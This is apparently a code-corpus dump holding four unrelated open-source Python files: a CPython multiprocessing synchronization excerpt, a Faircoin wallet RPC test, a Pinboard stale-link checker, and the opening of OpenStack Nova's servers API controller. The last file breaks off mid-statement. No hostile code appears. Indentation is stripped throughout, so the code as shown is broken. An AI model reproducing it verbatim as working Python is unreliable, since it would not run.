for i in range(sleepers):
self._woken_count.acquire() # wait for a sleeper to wake
# rezero wait_semaphore in case some timeouts just happened
while self._wait_semaphore.acquire(False):
pass
def notify_all(self):
self.notify(n=sys.maxsize)
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = _time() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - _time()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
#
# Event
#
class Event(object):
def __init__(self, *, ctx):
self._cond = ctx.Condition(ctx.Lock())
self._flag = ctx.Semaphore(0)
def is_set(self):
with self._cond:
if self._flag.acquire(False):
self._flag.release()
return True
return False
def set(self):
with self._cond:
self._flag.acquire(False)
self._flag.release()
self._cond.notify_all()
def clear(self):
with self._cond:
self._flag.acquire(False)
def wait(self, timeout=None):
with self._cond:
if self._flag.acquire(False):
self._flag.release()
else:
self._cond.wait(timeout)
if self._flag.acquire(False):
self._flag.release()
return True
return False
#
# Barrier
#
class Barrier(threading.Barrier):
def __init__(self, parties, action=None, timeout=None, *, ctx):
import struct
from .heap import BufferWrapper
wrapper = BufferWrapper(struct.calcsize('i') * 2)
cond = ctx.Condition()
self.__setstate__((parties, action, timeout, cond, wrapper))
self._state = 0
self._count = 0
def __setstate__(self, state):
(self._parties, self._action, self._timeout,
self._cond, self._wrapper) = state
self._array = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._parties, self._action, self._timeout,
self._cond, self._wrapper)
@property
def _state(self):
return self._array[0]
@_state.setter
def _state(self, value):
self._array[0] = value
@property
def _count(self):
return self._array[1]
@_count.setter
def _count(self, value):
self._array[1] = value
| kenshay/ImageScript | Script_Runner/PYTHON/Lib/multiprocessing/synchronize.py | Python | gpl-3.0 | 11,587 |
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
start_nodes,
assert_equal,
)
class WalletAccountsTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0]
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Bitcoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
assert_equal(address_group[0][1], 50)
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" account has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
node.sendfrom("", common_address, fee)
accounts = ["a", "b", "c", "d", "e"]
amount_to_send = 1.0
account_addresses = dict()
for account in accounts:
address = node.getaccountaddress(account)
account_addresses[account] = address
node.getnewaddress(account)
assert_equal(node.getaccount(address), account)
assert(address in node.getaddressesbyaccount(account))
node.sendfrom("", address, amount_to_send)
node.generate(1)
for i in range(len(accounts)):
from_account = accounts[i]
to_account = accounts[(i+1) % len(accounts)]
to_address = account_addresses[to_account]
node.sendfrom(from_account, to_address, amount_to_send)
node.generate(1)
for account in accounts:
address = node.getaccountaddress(account)
assert(address != account_addresses[account])
assert_equal(node.getreceivedbyaccount(account), 2)
node.move(account, "", node.getbalance(account))
node.generate(101)
expected_account_balances = {"": 5200}
for account in accounts:
expected_account_balances[account] = 0
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 5200)
for account in accounts:
address = node.getaccountaddress("")
node.setaccount(address, account)
assert(address in node.getaddressesbyaccount(account))
assert(address not in node.getaddressesbyaccount(""))
for account in accounts:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, account)
node.sendfrom("", multisig_address, 50)
node.generate(101)
for account in accounts:
assert_equal(node.getbalance(account), 50)
if __name__ == '__main__':
WalletAccountsTest().main()
| faircoin/faircoin | test/functional/wallet-accounts.py | Python | mit | 5,091 |
#!/usr/bin/env python
#
# Copyright (c) 2010-2019 Jon Parise <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Identify (and optionally delete) stale Pinboard links."""
from __future__ import print_function
import collections
import getpass
import json
import os
import re
import ssl
import sys
try:
from urllib.parse import urldefrag, urlencode, urlparse, urljoin
from urllib.request import Request, urlopen
except ImportError:
from urlparse import urldefrag, urljoin, urlparse
from urllib import urlencode
from urllib2 import Request, urlopen
__author__ = 'Jon Parise <[email protected]>'
__version__ = '2.0-dev'
PINBOARD_API_BASE = 'https://api.pinboard.in/v1/'
USER_AGENT = \
'Mozilla/5.0 (compatible; stale/{}; +https://github.com/jparise/stale)' \
.format(__version__)
COLORS = collections.defaultdict(str)
def pinboard_call(path, token, **kwargs):
"""Make a Pinboard API request and return a JSON-parsed response."""
params = kwargs.copy()
params['auth_token'] = token
params['format'] = 'json'
url = urljoin(PINBOARD_API_BASE, path)
url += '?' + urlencode(params)
request = Request(url)
request.add_header('User-Agent', USER_AGENT)
response = urlopen(url)
return json.load(response)
def check_url(url):
"""Check the given URL by issuring a HEAD request."""
# We don't want to include a fragment in our request.
url, fragment = urldefrag(url)
# Attempt to open the target URL using a HEAD request.
request = Request(url)
request.get_method = lambda: 'HEAD'
request.add_header('User-Agent', USER_AGENT)
return urlopen(request)
def report(code, url):
if str(code) == 'OK':
color = 'green'
else:
color = 'red'
print('{}[{}] {}{}'.format(COLORS[color], code, COLORS['normal'], url))
def supports_color():
# Windows only supports colors if ANSICON is defined.
if sys.platform == 'win32' and 'ANSICON' not in os.environ:
return False
# Otherwise, we assume all TTYs support ANSI color.
return getattr(sys.stdout, 'isatty', False)
def main():
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-t', '--token',
help="your Pinboard API token ('username:hex-values')")
parser.add_argument('--ignore', nargs='+', type=re.compile,
help="ignore links from these hosts", metavar='REGEX')
parser.add_argument('-d', '--delete', action='store_true',
help="delete stale links", default=False)
parser.add_argument('-e', action='store_true', dest='errors',
help="equate errors with staleness", default=False)
parser.add_argument('-v', action='store_true', dest='verbose',
help="enable verbose output", default=False)
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
if not args.token:
try:
args.token = getpass.getpass('API Token: ')
except KeyboardInterrupt:
sys.exit(0)
# If the terminal supports ANSI color, set up our color codes.
if supports_color():
COLORS['normal'] = '\033[0m'
COLORS['green'] = '\033[32m'
COLORS['red'] = '\033[31m'
try:
posts = pinboard_call('posts/all', token=args.token)
except Exception as e:
print("Failed to retrieve posts:", e)
sys.exit(1)
if not posts:
print("No posts were retrieved.")
sys.exit(1)
if args.verbose:
print("Checking {} posts ...".format(len(posts)))
for post in posts:
url = post['href']
stale = False
# If we have some hostnames to ignore, parse the URL and check if it
# matches one of the patterns.
if args.ignore:
parsed = urlparse(url)
for pattern in args.ignore:
if pattern.match(parsed.hostname):
report('Skip', url)
continue
try:
result = check_url(url)
except KeyboardInterrupt:
break
except (IOError, ssl.CertificateError) as e:
report('!!', url)
print('> ' + str(e).replace('\n', '\n> '))
if args.errors:
stale = True
else:
code = result.getcode()
if code / 100 == 4 and code != 403:
stale = True
report(str(code), url)
elif args.verbose:
report('OK', url)
if stale and args.delete:
print(" Deleting {}".format(url))
try:
pinboard_call('posts/delete', token=args.token, url=url)
except Exception as e:
print('> ' + str(e))
if __name__ == '__main__':
main()
| jparise/stale | stale.py | Python | mit | 5,905 |
# Copyright 2010 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import os
import re
from oslo.config import cfg
from oslo import messaging
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute import ips
from nova.api.openstack.compute.views import servers as views_servers
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import block_device
from nova import compute
from nova.compute import flavors
from nova import exception
from nova.objects import block_device as block_device_obj
from nova.objects import instance as instance_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import strutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import policy
from nova import utils
server_opts = [
cfg.BoolOpt('enable_instance_password',
default=True,
help='Enables returning of the instance password by the'
' relevant server API calls such as create, rebuild'
' or rescue, If the hypervisor does not support'
' password injection then the password returned will'
' not be correct'),
]
CONF = cfg.CONF
CONF.register_opts(server_opts)
CONF.import_opt('network_api_class', 'nova.network')
CONF.import_opt('reclaim_instance_interval', 'nova.compute.manager')
LOG = logging.getLogger(__name__)
XML_WARNING = False
def make_fault(elem):
fault = xmlutil.SubTemplateElement(elem, 'fault', selector='fault')
fault.set('code')
fault.set('created')
msg = xmlutil.SubTemplateElement(fault, 'message')
msg.text = 'message'
det = xmlutil.SubTemplateElement(fault, 'details')
det.text = 'details'
def make_server(elem, detailed=False):
elem.set('name')
elem.set('id')
global XML_WARNING
if not XML_WARNING:
LOG.warning(_('XML support has been deprecated and may be removed '
'as early as the Juno release.'))
XML_WARNING = True
if detailed:
elem.set('userId', 'user_id')
elem.set('tenantId', 'tenant_id')
elem.set('updated')
elem.set('created')
elem.set('hostId')
elem.set('accessIPv4')
elem.set('accessIPv6')
elem.set('status')
elem.set('progress')
elem.set('reservation_id')
# Attach image node
image = xmlutil.SubTemplateElement(elem, 'image', selector='image')
image.set('id')
xmlutil.make_links(image, 'links')
# Attach flavor node
flavor = xmlutil.SubTemplateElement(elem, 'flavor', selector='flavor')
flavor.set('id')
xmlutil.make_links(flavor, 'links')
# Attach fault node
make_fault(elem)
# Attach metadata node
elem.append(common.MetadataTemplate())
# Attach addresses node
elem.append(ips.AddressesTemplate())
xmlutil.make_links(elem, 'links')
server_nsmap = {None: xmlutil.XMLNS_V11, 'atom': xmlutil.XMLNS_ATOM}
class ServerTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server', selector='server')
make_server(root, detailed=True)
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
class MinimalServersTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('servers')
elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')
make_server(elem)
xmlutil.make_links(root, 'servers_links')
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
class ServersTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('servers')
elem = xmlutil.SubTemplateElement(root, 'server', selector='servers')
make_server(elem, detailed=True)
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
class ServerAdminPassTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server')
root.set('adminPass')
return xmlutil.SlaveTemplate(root, 1, nsmap=server_nsmap)
class ServerMultipleCreateTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('server')
root.set('reservation_id')
return xmlutil.MasterTemplate(root, 1, nsmap=server_nsmap)
def FullServerTemplate():
master = ServerTemplate()
master.attach(ServerAdminPassTemplate())
return master
class CommonDeserializer(wsgi.MetadataXMLDeserializer):
"""Common deserializer to handle xml-formatted server create requests.
Handles standard server attributes as well as optional metadata
and personality attributes
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_personality(self, server_node):
"""Marshal the personality attribute of a parsed request."""
node = self.find_first_child_named(server_node, "personality")
if node is not None:
personality = []
for file_node in self.find_children_named(node, "file"):
item = {}
if file_node.hasAttribute("path"):
item["path"] = file_node.getAttribute("path")
item["contents"] = self.extract_text(file_node)
personality.append(item)
return personality
else:
return None
def _extract_server(self, node):
"""Marshal the server attribute of a parsed request."""
server = {}
server_node = self.find_first_child_named(node, 'server')
attributes = ["name", "imageRef", "flavorRef", "adminPass",
"accessIPv4", "accessIPv6", "key_name",
"availability_zone", "min_count", "max_count"]
for attr in attributes:
if server_node.getAttribute(attr):
server[attr] = server_node.getAttribute(attr)
res_id = server_node.getAttribute('return_reservation_id')
if res_id:
server['return_reservation_id'] = \
strutils.bool_from_string(res_id)
scheduler_hints = self._extract_scheduler_hints(server_node)
if scheduler_hints:
server['OS-SCH-HNT:scheduler_hints'] = scheduler_hints
metadata_node = self.find_first_child_named(server_node, "metadata")
if metadata_node is not None:
server["metadata"] = self.extract_metadata(metadata_node)
user_data_node = self.find_first_child_named(server_node, "user_data")
if user_data_node is not None:
server["user_data"] = self.extract_text(user_data_node)
personality = self._extract_personality(server_node)
if personality is not None:
server["personality"] = personality
networks = self._extract_networks(server_node)
if networks is not None:
server["networks"] = networks
security_groups = self._extract_security_groups(server_node)
if security_groups is not None:
server["security_groups"] = security_groups
# NOTE(vish): this is not namespaced in json, so leave it without a
# namespace for now
block_device_mapping = self._extract_block_device_mapping(server_node)
if block_device_mapping is not None:
server["block_device_mapping"] = block_device_mapping
block_device_mapping_v2 = self._extract_block_device_mapping_v2(
server_node)
if block_device_mapping_v2 is not None:
server["block_device_mapping_v2"] = block_device_mapping_v2
# NOTE(vish): Support this incorrect version because it was in the code
# base for a while and we don't want to accidentally break
# anyone that might be using it.
auto_disk_config = server_node.getAttribute('auto_disk_config')
if auto_disk_config:
server['OS-DCF:diskConfig'] = auto_disk_config
auto_disk_config = server_node.getAttribute('OS-DCF:diskConfig')
if auto_disk_config:
server['OS-DCF:diskConfig'] = auto_disk_config
config_drive = server_node.getAttribute('config_drive')
if config_drive:
server['config_drive'] = config_drive
return server
def _extract_block_device_mapping(self, server_node):
"""Marshal the block_device_mapping node of a parsed request."""
node = self.find_first_child_named(server_node, "block_device_mapping")
if node:
block_device_mapping = []
for child in self.extract_elements(node):
if child.nodeName != "mapping":
continue
mapping = {}
attributes = ["volume_id", "snapshot_id", "device_name",
"virtual_name", "volume_size"]
for attr in attributes:
value = child.getAttribute(attr)
if value:
mapping[attr] = value
attributes = ["delete_on_termination", "no_device"]
for attr in attributes:
value = child.getAttribute(attr)
if value:
mapping[attr] = strutils.bool_from_string(value)
block_device_mapping.append(mapping)
return block_device_mapping
else:
return None
def _extract_block_device_mapping_v2(self, server_node):
"""Marshal the new block_device_mappings."""
node = self.find_first_child_named(server_node,
"block_device_mapping_v2")
if node:
block_device_mapping = []
for child in self.extract_elements(node):
if child.nodeName != "mapping":
continue
block_device_mapping.append(
dict((attr, child.getAttribute(attr))
for attr in block_device.bdm_new_api_fields
if child.getAttribute(attr)))
return block_device_mapping
def _extract_scheduler_hints(self, server_node):
"""Marshal the scheduler hints attribute of a parsed request."""
node = self.find_first_child_named_in_namespace(server_node,
"http://docs.openstack.org/compute/ext/scheduler-hints/api/v2",
"scheduler_hints")
if node:
scheduler_hints = {}
for child in self.extract_elements(node):
scheduler_hints.setdefault(child.nodeName, [])
value = self.extract_text(child).strip()
scheduler_hints[child.nodeName].append(value)
return scheduler_hints
else:
return None
def _extract_networks(self, server_node):
"""Marshal the networks attribute of a parsed request."""
node = self.find_first_child_named(server_node, "networks")
if node is not None:
networks = []
for network_node in self.find_children_named(node,
"network"):
item = {}
if network_node.hasAttribute("uuid"):
item["uuid"] = network_node.getAttribute("uuid")
if network_node.hasAttribute("fixed_ip"):
item["fixed_ip"] = network_node.getAttribute("fixed_ip")
if network_node.hasAttribute("port"):
item["port"] = network_node.getAttribute("port")
networks.append(item)
return networks
else:
return None
def _extract_security_groups(self, server_node):
"""Marshal the security_groups attribute of a parsed request."""
node = self.find_first_child_named(server_node, "security_groups")
if node is not None:
security_groups = []
for sg_node in self.find_children_named(node, "security_group"):
item = {}
name = self.find_attribute_or_element(sg_node, 'name')
if name:
item["name"] = name
security_groups.append(item)
return security_groups
else:
return None
class ActionDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted server action requests.
Handles standard server attributes as well as optional metadata
and personality attributes
"""
def default(self, string):
dom = xmlutil.safe_minidom_parse_string(string)
action_node = dom.childNodes[0]
action_name = action_node.tagName
action_deserializer = {
'createImage': self._action_create_image,
'changePassword': self._action_change_password,
'reboot': self._action_reboot,
'rebuild': self._action_rebuild,
'resize': self._action_resize,
'confirmResize': self._action_confirm_resize,
'revertResize': self._action_revert_resize,
}.get(action_name, super(ActionDeserializer, self).default)
action_data = action_deserializer(action_node)
return {'body': {action_name: action_data}}
def _action_create_image(self, node):
return self._deserialize_image_action(node, ('name',))
def _action_change_password(self, node):
if not node.hasAttribute("adminPass"):
raise AttributeError("No adminPass was specified in request")
return {"adminPass": node.getAttribute("adminPass")}
def _action_reboot(self, node):
if not node.hasAttribute("type"):
raise AttributeError("No reboot type was specified in request")
return {"type": node.getAttribute("type")}
def _action_rebuild(self, node):
rebuild = {}
if node.hasAttribute("name"):
name = node.getAttribute("name")
if not name:
raise AttributeError("Name cannot be blank")
rebuild['name'] = name
if node.hasAttribute("auto_disk_config"):
rebuild['OS-DCF:diskConfig'] = node.getAttribute(
"auto_disk_config")
if node.hasAttribute("OS-DCF:diskConfig"):
rebuild['OS-DCF:diskConfig'] = node.getAttribute(
"OS-DCF:diskConfig")
metadata_node = self.find_first_child_named(node, "metadata")
if metadata_node is not None:
rebuild["metadata"] = self.extract_metadata(metadata_node)
personality = self._extract_personality(node)
if personality is not None:
rebuild["personality"] = personality
if not node.hasAttribute("imageRef"):
raise AttributeError("No imageRef was specified in request")
rebuild["imageRef"] = node.getAttribute("imageRef")
if node.hasAttribute("adminPass"):
rebuild["adminPass"] = node.getAttribute("adminPass")
if node.hasAttribute("accessIPv4"):
rebuild["accessIPv4"] = node.getAttribute("accessIPv4")
if node.hasAttribute("accessIPv6"):
rebuild["accessIPv6"] = node.getAttribute("accessIPv6")
if node.hasAttribute("preserve_ephemeral"):
rebuild["preserve_ephemeral"] = strutils.bool_from_string(
node.getAttribute("preserve_ephemeral"), strict=True)
return rebuild
def _action_resize(self, node):
resize = {}
if node.hasAttribute("flavorRef"):
resize["flavorRef"] = node.getAttribute("flavorRef")
else:
raise AttributeError("No flavorRef was specified in request")
if node.hasAttribute("auto_disk_config"):
resize['OS-DCF:diskConfig'] = node.getAttribute("auto_disk_config")
if node.hasAttribute("OS-DCF:diskConfig"):
resize['OS-DCF:diskConfig'] = node.getAttribute(
"OS-DCF:diskConfig")
return resize
def _action_confirm_resize(self, node):
return None
def _action_revert_resize(self, node):
return None
def _deserialize_image_action(self, node, allowed_attributes):
data = {}
for attribute in allowed_attributes:
value = node.getAttribute(attribute)
if value:
data[attribute] = value
metadata_node = self.find_first_child_named(node, 'metadata')
if metadata_node is not None:
metadata = self.metadata_deserializer.extract_metadata(
metadata_node)
data['metadata'] = metadata
return data
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted server create requests.
Handles standard server attributes as well as optional metadata
and personality attributes
"""
def default(self, string):
"""Deserialize an xml-formatted server create request."""
dom = xmlutil.safe_minidom_parse_string(string)
server = self._extract_server(dom)
return {'body': {'server': server}}
class Controller(wsgi.Controller):
"""The Server API base controller class for the OpenStack API."""
_view_builder_class = views_servers.ViewBuilder
@staticmethod
def _add_location(robj):
# Just in case...
if 'server' not in robj.obj:
return robj
link = filter(lambda l: l['rel'] == 'self',
robj.obj['server']['links'])
if link:
robj['Location'] = utils.utf8(link[0]['href'])
# Convenience return
return robj
def __init__(self, ext_mgr=None, **kwargs):
super(Controller, self).__init__(**kwargs)
self.compute_api = compute.API()
self.ext_mgr = ext_mgr
@wsgi.serializers(xml=MinimalServersTemplate)
def index(self, req):
"""Returns a list of server names and ids for a given user."""
try:
servers = self._get_servers(req, is_detail=False)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
@wsgi.serializers(xml=ServersTemplate)
def detail(self, req):
"""Returns a list of server details for a given user."""
try:
servers = self._get_servers(req, is_detail=True)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
def _get_servers(self, req, is_detail):
"""Returns a list of servers, based on any search options specified."""
search_opts = {}
search_opts.update(req.GET)
context = req.environ['nova.context']
remove_invalid_options(context, search_opts,
self._get_server_search_options())
# Verify search by 'status' contains a valid status.
# Convert it to filter by vm_state or task_state for compute_api.
status = search_opts.pop('status', None)
if status is not None:
vm_state, task_state = common.task_and_vm_state_from_status(status)
if not vm_state and not task_state:
return {'servers': []}
search_opts['vm_state'] = vm_state
# When we search by vm state, task state will return 'default'.
# So we don't need task_state search_opt.
if 'default' not in task_state:
search_opts['task_state'] = task_state
if 'changes-since' in search_opts:
try:
parsed = timeutils.parse_isotime(search_opts['changes-since'])
except ValueError:
msg = _('Invalid changes-since value')
raise exc.HTTPBadRequest(explanation=msg)
search_opts['changes-since'] = parsed
# By default, compute's get_all() will return deleted instances.
# If an admin hasn't specified a 'deleted' search option, we need
# to filter out deleted instances by setting the filter ourselves.
# ... Unless 'changes-since' is specified, because 'changes-since'
# should return recently deleted images according to the API spec.
if 'deleted' not in search_opts:
if 'changes-since' not in search_opts:
# No 'changes-since', so we only want non-deleted servers
search_opts['deleted'] = False
if search_opts.get("vm_state") == ['deleted']:
if context.is_admin:
search_opts['deleted'] = True
else:
msg = _("Only administrators may list deleted instances")
raise exc.HTTPForbidden(explanation=msg)
# If all tenants is passed with 0 or false as the value
# then remove it from the search options. Nothing passed as
# the value for all_tenants is considered to enable the feature
all_tenants = search_opts.get('all_tenants')
if all_tenants:
try:
if not strutils.bool_from_string(all_tenants, True):
del search_opts['all_tenants']
except ValueError as err:
raise exception.InvalidInput(str(err))
if 'all_tenants' in search_opts:
policy.enforce(context, 'compute:get_all_tenants',
{'project_id': context.project_id,
'user_id': context.user_id})
del search_opts['all_tenants']
else:
if context.project_id:
search_opts['project_id'] = context.project_id
else:
search_opts['user_id'] = context.user_id
limit, marker = common.get_limit_and_marker(req)
try:
instance_list = self.compute_api.get_all(context,
search_opts=search_opts,
limit=limit,
marker=marker,
want_objects=True)
except exception.MarkerNotFound:
msg = _('marker [%s] not found') % marker
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
log_msg = _("Flavor '%s' could not be found ")
LOG.debug(log_msg, search_opts['flavor'])
# TODO(mriedem): Move to ObjectListBase.__init__ for empty lists.
instance_list = instance_obj.InstanceList(objects=[])
if is_detail:
instance_list.fill_faults()
response = self._view_builder.detail(req, instance_list)
else:
response = self._view_builder.index(req, instance_list)
req.cache_db_instances(instance_list)
return response
def _get_server(self, context, req, instance_uuid):
"""Utility function for looking up an instance by uuid."""
try:
instance = self.compute_api.get(context, instance_uuid,
want_objects=True)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
req.cache_db_instance(instance)
return instance
def _check_string_length(self, value, name, max_length=None):
try:
if isinstance(value, six.string_types):
value = value.strip()
utils.check_string_length(value, name, min_length=1,
max_length=max_length)
except exception.InvalidInput as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
def _validate_server_name(self, value):
self._check_string_length(value, 'Server name', max_length=255)
def _get_injected_files(self, personality):
"""Create a list of injected files from the personality attribute.
At this time, injected_files must be formatted as a list of
(file_path, file_content) pairs for compatibility with the
underlying compute service.
"""
injected_files = []
for item in personality:
try:
path = item['path']
contents = item['contents']
except KeyError as key:
expl = _('Bad personality format: missing %s') % key
raise exc.HTTPBadRequest(explanation=expl)
except TypeError:
expl = _('Bad personality format')
raise exc.HTTPBadRequest(explanation=expl)
if self._decode_base64(contents) is None:
expl = _('Personality content for %s cannot be decoded') % path
raise exc.HTTPBadRequest(explanation=expl)
injected_files.append((path, contents))
return injected_files
def _get_requested_networks(self, requested_networks):
"""Create a list of requested networks from the networks attribute."""
networks = []
for network in requested_networks:
try:
port_id = network.get('port', None)
if port_id:
network_uuid = None
if not utils.is_neutron():
# port parameter is only for neutron v2.0
msg = _("Unknown argument : port")
raise exc.HTTPBadRequest(explanation=msg)
if not uuidutils.is_uuid_like(port_id):
msg = _("Bad port format: port uuid is "
"not in proper format "
"(%s)") % port_id
raise exc.HTTPBadRequest(explanation=msg)
else:
network_uuid = network['uuid']
if not port_id and not uuidutils.is_uuid_like(network_uuid):
br_uuid = network_uuid.split('-', 1)[-1]
if not uuidutils.is_uuid_like(br_uuid):
msg = _("Bad networks format: network uuid is "
"not in proper format "
"(%s)") % network_uuid
raise exc.HTTPBadRequest(explanation=msg)
#fixed IP address is optional
#if the fixed IP address is not provided then
#it will use one of the available IP address from the network
address = network.get('fixed_ip', None)
if address is not None and not utils.is_valid_ip_address(
address):
msg = _("Invalid fixed IP address (%s)") % address
raise exc.HTTPBadRequest(explanation=msg)
# For neutronv2, requested_networks
# should be tuple of (network_uuid, fixed_ip, port_id)
if utils.is_neutron():
networks.append((network_uuid, address, port_id))
else:
# check if the network id is already present in the list,
# we don't want duplicate networks to be passed
# at the boot time
for id, ip in networks:
if id == network_uuid:
expl = (_("Duplicate networks"
" (%s) are not allowed") %
network_uuid)
raise exc.HTTPBadRequest(explanation=expl)
networks.append((network_uuid, address))
except KeyError as key:
expl = _('Bad network format: missing %s') % key
raise exc.HTTPBadRequest(explanation=expl)
except TypeError:
expl = _('Bad networks format')
raise exc.HTTPBadRequest(explanation=expl)
return networks
# NOTE(vish): Without this regex, b64decode will happily
# ignore illegal bytes in the base64 encoded
# data.
B64_REGEX = re.compile('^(?:[A-Za-z0-9+\/]{4})*'
'(?:[A-Za-z0-9+\/]{2}=='
'|[A-Za-z0-9+\/]{3}=)?$')
def _decode_base64(self, data):
data = re.sub(r'\s', '', data)
if not self.B64_REGEX.match(data):
return None
try:
return base64.b64decode(data)
except TypeError:
return None
def _validate_user_data(self, user_data):
"""Check if the user_data is encoded properly."""
if not user_data:
return
if self._decode_base64(user_data) is None:
expl = _('Userdata content cannot be decoded')
raise exc.HTTPBadRequest(explanation=expl)
def _validate_access_ipv4(self, address):
if not utils.is_valid_ipv4(address):
expl = _('accessIPv4 is not proper IPv4 format')
raise exc.HTTPBadRequest(explanation=expl)
def _validate_access_ipv6(self, address):
if not utils.is_valid_ipv6(address):
expl = _('accessIPv6 is not proper IPv6 format')
raise exc.HTTPBadRequest(explanation=expl)
@wsgi.serializers(xml=ServerTemplate)
def show(self, req, id):
"""Returns server details by server id."""
try:
context = req.environ['nova.context']
instance = self.compute_api.get(context, id,
want_objects=True)
req.cache_db_instance(instance)
return self._view_builder.show(req, instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.response(202)
@wsgi.serializers(xml=FullServerTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new server for a given user."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPUnprocessableEntity()
context = req.environ['nova.context']
server_dict = body['server']
password = self._get_server_admin_password(server_dict)
if 'name' not in server_dict:
msg = _("Server name is not defined")
raise exc.HTTPBadRequest(explanation=msg)
name = server_dict['name']
self._validate_server_name(name)
name = name.strip()
image_uuid = self._image_from_req_data(body)
personality = server_dict.get('personality')
config_drive = None
if self.ext_mgr.is_loaded('os-config-drive'):
config_drive = server_dict.get('config_drive')
injected_files = []
if personality:
injected_files = self._get_injected_files(personality)
sg_names = []
if self.ext_mgr.is_loaded('os-security-groups'):
security_groups = server_dict.get('security_groups')
if security_groups is not None:
sg_names = [sg['name'] for sg in security_groups
if sg.get('name')]
if not sg_names:
sg_names.append('default')
sg_names = list(set(sg_names))
requested_networks = None
if (self.ext_mgr.is_loaded('os-networks')
or utils.is_neutron()):
